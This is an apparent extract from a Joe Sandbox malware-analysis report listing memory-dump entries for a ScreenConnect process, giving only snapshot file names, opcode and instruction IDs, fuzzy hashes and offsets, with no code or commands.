                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (nq
                                                                                                                                                                                                                                                                          • API String ID: 0-2756854522
                                                                                                                                                                                                                                                                          • Opcode ID: 24263d5acc181865a2cbb6cc3d6dbd3ae9f9b74a2fe7d759cea705248e2554fc
                                                                                                                                                                                                                                                                          • Instruction ID: 49581ad2a4894bbb3ec64dc0c6daf96708e15dcedb3a3ffb6de5a8c44c6349c0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24263d5acc181865a2cbb6cc3d6dbd3ae9f9b74a2fe7d759cea705248e2554fc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5841F531A48109CFCB15EF68D8946AEBBB6EF84301F18C5A9D8059B355DF35ED06CB90
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                          • API String ID: 0-1334834377
                                                                                                                                                                                                                                                                          • Opcode ID: a60f3acc38da00cc15bc329dc6fbc6664cd5f04281d94da72bc2812e978afb82
                                                                                                                                                                                                                                                                          • Instruction ID: aa1d797722005a6106da019a426620243ba0f534147985c3f80fa5fa56c09d38
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a60f3acc38da00cc15bc329dc6fbc6664cd5f04281d94da72bc2812e978afb82
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F31FD71B042455F8715EB38A880A6F7BEAEF8631071485BEE825EB345EF30DD08CB90
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                          • API String ID: 0-1334834377
                                                                                                                                                                                                                                                                          • Opcode ID: 899df509fb93411dbd908626462d38a537df147c277e96024f99d90751a90ec5
                                                                                                                                                                                                                                                                          • Instruction ID: 090da200ce7bf10165d89856db1e49da8dbd989ff0ba9434d65d479a47622836
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 899df509fb93411dbd908626462d38a537df147c277e96024f99d90751a90ec5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC310031B102055B8758EB78A880A5F77EAEF89710714857DE826DB344EF70EE088BD0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: LRjq
                                                                                                                                                                                                                                                                          • API String ID: 0-665714880
                                                                                                                                                                                                                                                                          • Opcode ID: 6037cf44e3ce3d9b9148ad1cad341f57f118988f65cf2ab2a60c2e78850485d8
                                                                                                                                                                                                                                                                          • Instruction ID: 9be697c81b74df27fe4360c32f13b7014b2d5660619654690b66cff1c8b400f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6037cf44e3ce3d9b9148ad1cad341f57f118988f65cf2ab2a60c2e78850485d8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A421A331B042049BD718EF65DC59BAF7AF6BB89710F1844ADE502AB290EE719C41CB51
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: $jq
                                                                                                                                                                                                                                                                          • API String ID: 0-2886413773
                                                                                                                                                                                                                                                                          • Opcode ID: c772c9dd913027ef49c2174c1d30d5ed0eaf5fa1048c6ff15a79df5cd2a3c283
                                                                                                                                                                                                                                                                          • Instruction ID: dd48476b5ee0cd6b63d330f6b8ba080848744150997f064d340d7409408dc30d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c772c9dd913027ef49c2174c1d30d5ed0eaf5fa1048c6ff15a79df5cd2a3c283
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40E04F305496008FC721CF24D5505123BF0AF1A61135641DAD848CF676C621CC51DA21
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3c313e808735227e6d56626670c30898478adcb9f9707391e8e5fa5026b3921a
                                                                                                                                                                                                                                                                          • Instruction ID: bb011a9086735344cb59798a0eec72d6fd2cfe9f06e01571eb173b396874a86c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c313e808735227e6d56626670c30898478adcb9f9707391e8e5fa5026b3921a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46A11634B002088FCB14DBA8C994AAEBBF6EF89300F1445A9E506EB365DB75ED05CF50
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 0d20cd8772b36a2a0af603711ea1659595bc219d356e65d93514eb0f401058aa
                                                                                                                                                                                                                                                                          • Instruction ID: e92c7a256591fa5f10331edc38c810e5a8265d0d21e92d9495a04085d1fc93fa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d20cd8772b36a2a0af603711ea1659595bc219d356e65d93514eb0f401058aa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5A11734B402088FCB14DFA8C994AADBBF6EF89300B1445A9E506EB365DB75ED05CF51
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6d81301518191b018a679fd27b37823bc5200d9d0d7f2dec84b42598cfc61161
                                                                                                                                                                                                                                                                          • Instruction ID: 5eccf9090dddcadfdcefa5ff6fed4e25e95b4b7abe53e9bf43dffa108c965e48
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d81301518191b018a679fd27b37823bc5200d9d0d7f2dec84b42598cfc61161
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56515D34B002058FCB14DFB8D99496EB7E6EF99310B1484A9E556CF329EB34EC06CB90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1fd0ee38c3c4786c29c571547f0b7ff37fd2881ffae5bbf0b08c868566b2e8b6
                                                                                                                                                                                                                                                                          • Instruction ID: 643f28c49f8dcd0b953b637f2ab10719ad8410983591e2a61d07192b5583e7db
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fd0ee38c3c4786c29c571547f0b7ff37fd2881ffae5bbf0b08c868566b2e8b6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4514D34B002058FCB14DFA8D99496EB7EAEF99310B1484A9E556CF325EB74EC06CB90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3839c40a1b63c3d8a25de007bfb9fd2cfef61153305477d79bc6822efed7b8dd
                                                                                                                                                                                                                                                                          • Instruction ID: dd65e6514a25428de57a7b8dff31da7b51284df7f6b6def5efcd672bedf426f1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3839c40a1b63c3d8a25de007bfb9fd2cfef61153305477d79bc6822efed7b8dd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D851AD707106068FCB64EB28D954A6F77E6EF88310B1484B8E906DB3A5EF35DE45CB90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 65d25c28e15d08c1d05b5280c26c2fe9101988869402825d448982d4d1da4e8c
                                                                                                                                                                                                                                                                          • Instruction ID: 39fe8b2d212c67e543f4f719ad5ec77895e91291c91b5685949f2a54ff59c4cc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65d25c28e15d08c1d05b5280c26c2fe9101988869402825d448982d4d1da4e8c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15519F707106068FCB64EB28D954A6F77E6EF89300B1484B8D906DB3A5EF35EE45CB90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e752bf1a329f365df185f23729a259f823907ac2ab41675e1afc4e18c65d8bf9
                                                                                                                                                                                                                                                                          • Instruction ID: 976db0af53d0aa8cb1fefad4ff06b67738df22f0d7f7867f574b0971b5e9c32a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e752bf1a329f365df185f23729a259f823907ac2ab41675e1afc4e18c65d8bf9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C510A306007058FD724DF29D994A56B7F2FF8E325B244AACD4968BBA4DB31E806CB40
Memory Dump Source
• Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 8a25a457911ce811f1bbd2e33f35c2db3678d5f6160a74a4543dc7f80bad8f3d
                                                                                                                                                                                                                                                                          • Instruction ID: a3775a6591694389717245bd1b4a207059607bbef14ede605cb7f103c055c0e8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a25a457911ce811f1bbd2e33f35c2db3678d5f6160a74a4543dc7f80bad8f3d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C51A070E403098FCB01DFB8D844B9EBBF5FF89310F1085A9E514AB265DB74A989CB90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 80c9abd6ae262bc67e60f8d272e5ab5ada8bc65459a01a19f94111ad3c37d80f
                                                                                                                                                                                                                                                                          • Instruction ID: 679c33b11d37004a89bc0f3085d4e606299dbdff9c3a8c003736517525065410
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80c9abd6ae262bc67e60f8d272e5ab5ada8bc65459a01a19f94111ad3c37d80f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78515C74E402099FDB01DFA8D844BDEBBF5FF89310F108599E114AB2A5DB74A989CB90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2f0b3033add5eeb79b1eaf73d7be8c9bee7b7970a282674265142b9007a32a00
                                                                                                                                                                                                                                                                          • Instruction ID: 7456923f6565cf6a0c3a815ebb2982ec88d84b349b596bb9fd8b2fd11bf1ea4d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f0b3033add5eeb79b1eaf73d7be8c9bee7b7970a282674265142b9007a32a00
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A414A307502148FC718DB79D894AAEBBF6EF89710B2485A9E406EB3A1DF749D05CB90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ab91312e85829f3bf97c0af2e006674e5b94390909b64698b0a9c68f9d334128
                                                                                                                                                                                                                                                                          • Instruction ID: 14fe6f78a05c9fd1bb6127b0942742f8fce2b5c041f6256df8bf24202971fe8a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab91312e85829f3bf97c0af2e006674e5b94390909b64698b0a9c68f9d334128
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE317030B582059BDB14DF69C8546AFF7F6EF8A354F1484AAD406E7264DF31DD018790
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f0e0c12b69d6589f4185674e8367d3fe7f50a3352bb62c2d1cc6f79cd80a5185
                                                                                                                                                                                                                                                                          • Instruction ID: 47826a07771e500ae8920ca0160e966459415362448e97970f34d8697505a38a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0e0c12b69d6589f4185674e8367d3fe7f50a3352bb62c2d1cc6f79cd80a5185
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA415C307502148FC718EB79D894AAEBBF6EF89710B2485A9E406DB3A1DF709D04CB90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 8af836c74359217c491d2cd006235f5bfb8ec0aa565e858c298c8e7d65d70a3c
                                                                                                                                                                                                                                                                          • Instruction ID: 3a6103579cc123e987011a2c29f88d1ac90a36f03383d21eeb26bfe081eb531c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8af836c74359217c491d2cd006235f5bfb8ec0aa565e858c298c8e7d65d70a3c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D318C71D046089FCF14DFA9C444AEEBBF4EF89310F14846AD409A3241DB78A941CFA4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 177f011ae337851e85814cd7554db4e964e0e911e1cc6feb2cc26bf20fdc5525
                                                                                                                                                                                                                                                                          • Instruction ID: d6cd7bd275f0e1495ca4615263fcff569f1b9e24e30ed4b62969ca516d764940
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 177f011ae337851e85814cd7554db4e964e0e911e1cc6feb2cc26bf20fdc5525
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD3102B5A04248CFCB04EFB4D94896EBBF4FF46711B1085AAE915D7262DB309E00CB61
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: eff08a36b1295190a99f761fde3f14bcba79bb0cd15157665c89d06ca93dbd22
                                                                                                                                                                                                                                                                          • Instruction ID: f4fafc0c34797daadbb341435a234f40d26fbaa7f9c28e45b0b9d6102107d390
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eff08a36b1295190a99f761fde3f14bcba79bb0cd15157665c89d06ca93dbd22
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45312C74604B058FC730DF29D844666BBF1FF4A320B144AADD4979BAA5D770E94ACF80
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.3272721890.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_b3d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 07d0b5f9289f03e31504d454c44b54c53e81eef061fd156ad2472343225e3977
                                                                                                                                                                                                                                                                          • Instruction ID: 228c6c49109684c3752a52fbf61bca1c124b859a6ffeb8e3bf99ad9cbe9b9e6c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07d0b5f9289f03e31504d454c44b54c53e81eef061fd156ad2472343225e3977
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40213475500200EFCB05DF24E9C4F26BFA5FB98314F30C6A9E9090B256C33AD816DBA2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: efe2b197e8049a0a5bf4dcee89bf7cfa793eab77bd609d1636deb2c33a5ac0b6
                                                                                                                                                                                                                                                                          • Instruction ID: 613553b556be96f223164995045dc8a34b9ad4467b4aa02cebd2fb66d9606e20
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efe2b197e8049a0a5bf4dcee89bf7cfa793eab77bd609d1636deb2c33a5ac0b6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 442104716002445FDB04EB28D891BAEBBE2EFC5310F14856AD4059F796EF30AD05CBA2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: fac293e6f341cf696a5cc33e0195a74ec03eebd926fac49f85b19e602740c0e9
                                                                                                                                                                                                                                                                          • Instruction ID: 201eecda7a27c1b7966d72c061b6a25dcf4a5231bd282d4df96222c666bfba92
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fac293e6f341cf696a5cc33e0195a74ec03eebd926fac49f85b19e602740c0e9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 992192316003098FCB05DF69D8819AEBBF5EF85310B1085B6E519DF315DB34AD05CB91
Memory Dump Source
• Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3272721890.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_b3d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                                                          • Instruction ID: 96fbb55a431e30598472b56601ad4e4f432a145dc546f893f7a5e035f01cae01
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6311B176504280DFCB16CF10E5C4B16BFB2FB98314F24C5A9D9490B256C336D85ADBA2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3e3eb7c357c7de38c44a15376ce95bb321dd0873080a3d328dd490ec4893c5af
                                                                                                                                                                                                                                                                          • Instruction ID: 3b694c888a5c160a415d76033388835e99ce5fdb70fac84261c335292ba47997
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e3eb7c357c7de38c44a15376ce95bb321dd0873080a3d328dd490ec4893c5af
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F2136B28046499FCB20CF9AC444BDEFBF4EB88320F14846AD519A7200D778A545CFA5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
